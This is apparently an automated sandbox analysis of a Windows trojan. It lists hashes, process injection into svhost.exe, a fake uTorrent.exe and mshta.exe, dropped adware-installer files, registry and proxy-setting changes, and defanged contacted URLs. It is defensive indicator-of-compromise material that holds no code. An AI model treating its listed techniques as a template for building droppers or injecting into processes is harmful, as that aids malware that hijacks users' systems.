MD5: 908a79ed48bacf717ac3d5729dc2ca6a
SHA1: de6bd01e8eee072c354189f8f627a202a42b2f48
SHA256: b6f288d55c7af6f85042e14efb6455aa2d80047b9cc8903fe37d22b731818b2f
SSDeep: 49152:vuHAHkXLi6tGj8YKuR1hQV6CkcJwgvt8ZAMnSpRfRLgfVPnu:vuRuNwYKEcRkcz16AMnyBRA9
Size: 3011656 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: StdLib
Created at: 2017-05-03 23:19:11
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1900

The Trojan injects its code into the following process(es):

svhost.exe:2916
uTorrent.exe:2944
mshta.exe:3704

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process svhost.exe:2916 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Imminent\Logs\27-07-2017 (608 bytes)

The process %original file name%.exe:1900 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\svhost.exe (691 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FolderN\co-re.exe.lnk (943 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FolderN\co-re.exe (146 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\uTorrent.exe (148 bytes)

The process uTorrent.exe:2944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\shell_scripts\shell_ping_after_close.js (312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\es.json (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\W4I10VCX.txt (89 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\scripts\common.js (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\index.hta.log (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\yandex_horz.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\shell_scripts\check_if_cscript_is_working.js (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\3rdparty\FS.ocx (965 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\loading.gif (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\uninstall.hta (575 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\scripts\initialize.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\uTorrent\settings.dat.new (73 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\ru.json (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\utt8A15.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-732923889-1296844034-1208581001-1000\1f91d2d17ea675d4c2c3192e241743f9_88dcd395-b062-45b3-a6cd-79f37c0eba08 (105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\main_utorrent.ico (107 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\br.json (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\styles\installer.css (587 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\it.json (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\3rdparty\FS.dll (933 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\scripts\uninstall.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7NMBDULB.txt (89 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\ko.json (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\logo_Yandex_RU_UA_vertical.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\de.json (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\search_protect.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\shell_scripts\shell_install_offer.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\install.1501130078.zip (281721 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\index.hta (739 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\scripts\es5-shim.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\yandex_horz_ru.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\main_icon.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\scripts\install.js (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\pt.json (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\en.json (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\styles\common.css (102 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\i18n\fr.json (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\main_bittorrent.ico (103 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\bt_icon_48px.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\yandex_browser_setup.bmp (204 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\utt8A15.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7NMBDULB.txt (0 bytes)

The process mshta.exe:3704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\BE.locale (256 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\DE.locale (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\browse.css (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\HU.locale (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\bg_test_B[1].png (4277 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\ES.locale (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\NO.locale (148 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0006BCAA.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\RO.locale (156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\LT.locale (166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\PL.locale (155 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\ML.locale (360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\FR.locale (163 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\bootstrap_30396.html (156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0006CD9A.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\EU.locale (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\FA.locale (186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\ID.locale (157 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\BS.locale (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ns480180C7\3B1DE5F8_stp\asgnd.json (6341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\KK.locale (218 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\RU.locale (266 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\YO.locale (146 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\VI.locale (180 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\images\progress-bg2.png (978 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D8501957525981.dat (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\TA.locale (330 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\UK.locale (255 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0006BB33.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\CA.locale (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\AZ.locale (177 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\KO.locale (141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\index.hta.log (33 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ns480180C7\3B1DE5F8_stp.CIS.part (711 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\PA.locale (257 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\RS_RA_V2_M_WIN[1].png (13448 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\images\main_utorrent.ico (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\EL.locale (235 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\PT.locale (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\SR.locale (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\HI.locale (284 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\main.css (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\ie6_main.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\ZH.locale (137 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\TH.locale (264 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\TR.locale (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\PS.locale (195 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\SV.locale (157 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\json[1].js (321 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\KA.locale (335 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\progress-bar.css (506 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\MR.locale (289 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\CS.locale (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\EN.locale (147 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ns480180C7\3B1DE5F8_stp.CIS (4340 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\fs_bg[1].png (1713 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\LO.locale (305 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\DA.locale (148 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\IS.locale (155 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\MS.locale (143 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\UR.locale (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0006BB52.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\images\progress-bg.png (1 bytes)
%Program Files%\0006BD84.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\ADBlock_icon[1].png (433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\BG.locale (223 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\HR.locale (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\EN[1].png (1421 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1746830794.log (240259 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\VPN_icon[1].png (364 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\checkbox.css (190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ns480180C7\2E832125_stp\icc.DAT (941 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\TL.locale (163 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\RS_RA_V1_FS[1].png (12328 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ns480180C7\2E832125_stp.CIS (8756 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\SL.locale (160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\ET.locale (145 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\IT.locale (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\AF.locale (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\GU.locale (318 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\HT.locale (143 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\JA.locale (195 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\KU.locale (132 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\HE.locale (166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\Video_icon[1].png (312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\NE.locale (334 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\SK.locale (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\MK.locale (221 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\TE.locale (320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\FI.locale (143 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\HY.locale (219 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D8501957525982.dat (4861 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0006BCB9.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\button.css (417 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\Battery_icon[1].png (213 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ns480180C7\2E832125_stp.CIS.part (759 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\UZ.locale (169 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\LV.locale (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\images\Loader.gif (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\images\button-bg.png (131 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\SQ.locale (149 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\NL.locale (146 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\ZU.locale (138 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\csshover3.htc (2 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0006CD9A.log (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\bootstrap_30396.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0006BB52.log (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0006BB33.log (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0006BCAA.log (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0006BCB9.log (0 bytes)
%Program Files%\0006BD84.log (0 bytes)

Registry activity

The process %original file name%.exe:1900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process uTorrent.exe:2944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{4E120188-0CAC-468C-B2D9-9D1F079EBC25}]
"(Default)" = "ActiveBinderX Control"

[HKCR\Interface\{8ACDC97A-ED69-44A0-9FA7-214AB3450F2D}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Classes\FalconBetaAccount]
"remote_access_client_id" = "0565552788"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E]
"LanguageList" = "en-US, en"

[HKCR\CLSID\{4E120188-0CAC-468C-B2D9-9D1F079EBC25}\Verb]
"(Default)" = ""

[HKCR\TypeLib\{C86D85A1-58F7-4E88-993F-F6435AAAAE5F}\1.0]
"(Default)" = "ActiveBinderProj Library"

[HKCR\Interface\{8ACDC97A-ED69-44A0-9FA7-214AB3450F2D}]
"(Default)" = "FS"

[HKCR\Interface\{C936EC34-11FC-4F15-81C3-8AA143BA8E4B}\TypeLib]
"(Default)" = "{C86D85A1-58F7-4E88-993F-F6435AAAAE5F}"

[HKCR\FS.ActiveBinderX]
"(Default)" = "ActiveBinderX Control"

[HKCR\TypeLib\{C86D85A1-58F7-4E88-993F-F6435AAAAE5F}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\3rdparty\FS.ocx"

[HKCR\Interface\{C936EC34-11FC-4F15-81C3-8AA143BA8E4B}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\CLSID\{4E120188-0CAC-468C-B2D9-9D1F079EBC25}\ToolboxBitmap32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\3rdparty\FS.ocx,1"

[HKCR\Interface\{8ACDC97A-ED69-44A0-9FA7-214AB3450F2D}\TypeLib]
"(Default)" = "{C86D85A1-58F7-4E88-993F-F6435AAAAE5F}"

[HKCR\Interface\{C936EC34-11FC-4F15-81C3-8AA143BA8E4B}]
"(Default)" = "IActiveBinderXEvents"

[HKCR\CLSID\{4E120188-0CAC-468C-B2D9-9D1F079EBC25}\Version]
"(Default)" = "1.0"

[HKCR\CLSID\{4E120188-0CAC-468C-B2D9-9D1F079EBC25}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\FS.ActiveBinderX\Clsid]
"(Default)" = "{4E120188-0CAC-468C-B2D9-9D1F079EBC25}"

[HKCR\CLSID\{4E120188-0CAC-468C-B2D9-9D1F079EBC25}\ProgID]
"(Default)" = "FS.ActiveBinderX"

[HKCR\CLSID\{4E120188-0CAC-468C-B2D9-9D1F079EBC25}\Control]
"(Default)" = ""

[HKCR\CLSID\{4E120188-0CAC-468C-B2D9-9D1F079EBC25}\MiscStatus]
"(Default)" = "0"

[HKCR\Interface\{C936EC34-11FC-4F15-81C3-8AA143BA8E4B}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{8ACDC97A-ED69-44A0-9FA7-214AB3450F2D}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{C936EC34-11FC-4F15-81C3-8AA143BA8E4B}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\CLSID\{4E120188-0CAC-468C-B2D9-9D1F079EBC25}\Verb\0]
"(Default)" = "Properties,0,2"

[HKCR\Interface\{8ACDC97A-ED69-44A0-9FA7-214AB3450F2D}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{C86D85A1-58F7-4E88-993F-F6435AAAAE5F}\1.0\FLAGS]
"(Default)" = "2"

[HKCR\CLSID\{4E120188-0CAC-468C-B2D9-9D1F079EBC25}\TypeLib]
"(Default)" = "{C86D85A1-58F7-4E88-993F-F6435AAAAE5F}"

[HKCR\CLSID\{4E120188-0CAC-468C-B2D9-9D1F079EBC25}\MiscStatus\1]
"(Default)" = "205201"

[HKCR\CLSID\{4E120188-0CAC-468C-B2D9-9D1F079EBC25}\InprocServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\3rdparty\FS.ocx"

[HKCR\TypeLib\{C86D85A1-58F7-4E88-993F-F6435AAAAE5F}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HYD8BAC.tmp.1501130078\HTA\3rdparty\"

The process mshta.exe:3704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\mshta_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1299588363"

[HKLM\SOFTWARE\Microsoft\Tracing\mshta_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\mshta_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\mshta_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\mshta_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\mshta_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\mshta_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\mshta_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\mshta_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\mshta_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "mshta.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\mshta_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://com-utorrent-prod-bench-290894750.us-east-1.elb.amazonaws.com/e?i=50
hxxp://download-new.utorrent.com/endpoint/hydra-ut/os/win7/track/stable/browser/ie/os-region/US/os-lang/en/os-ver/6.1/enc-ver/111258172/
hxxp://ip-api.com/json?callback=jQuery1910641311597549105_1501130082345&_=1501130082346
hxxp://rp.robotitor.com/?v=2.0&subver=6.21&pcrc=1696256498	52.213.197.187
hxxp://os.robotitor.com/BitTorrent/?v=6.0&c=958353824&t=441794	52.208.227.67
hxxp://com-utorrent-prod-bench-290894750.us-east-1.elb.amazonaws.com/e?i=50&e=eyJldmVudE5hbWUiOiJoeWRyYTEiLCJhY3Rpb24iOiJvZmZlciIsInBpZCI6IjI5NDQiLCJoIjoicjcwUkhTeU5XOE9UTnFMdSIsInYiOiIxMTEyNTgxNzIiLCJiIjo0MzU4MCwiY2wiOiJ1VG9ycmVudCIsImxuZyI6InJ1Iiwib3NhIjoiMzIiLCJzbG5nIjoiZW4iLCJkYiI6IldpbmRvd3MgSW50ZXJuZXQgRXhwbG9yZXIiLCJkYnYiOiI5LjAiLCJpYnIiOlt7Im5hbWUiOiJGaXJlZm94IiwidmVyc2lvbiI6IjQ5LjAiLCJleGVOYW1lIjoiZmlyZWZveCJ9LHsibmFtZSI6Ikdvb2dsZSBDaHJvbWUiLCJ2ZXJzaW9uIjoiNTQuMCIsImV4ZU5hbWUiOiJjaHJvbWUifSx7Im5hbWUiOiJXaW5kb3dzIEludGVybmV0IEV4cGxvcmVyIiwidmVyc2lvbiI6IjkuMCIsImV4ZU5hbWUiOiJpZXhwbG9yZSJ9XSwib2ZmZXJ0eXBlIjoicHJpbWFyeSIsInByb3ZpZGVyIjoiSXJvblNyYyIsImhvd21hbnkiOjEsIm9mZmVyc2hvd24iOjAsInN0YXR1cyI6ImxvYWRfRExMX3N1Y2NlZWQiLCJpcm9uc3JjX29mZmVyX3ZlcnNpb24iOiIxLjAifQ==
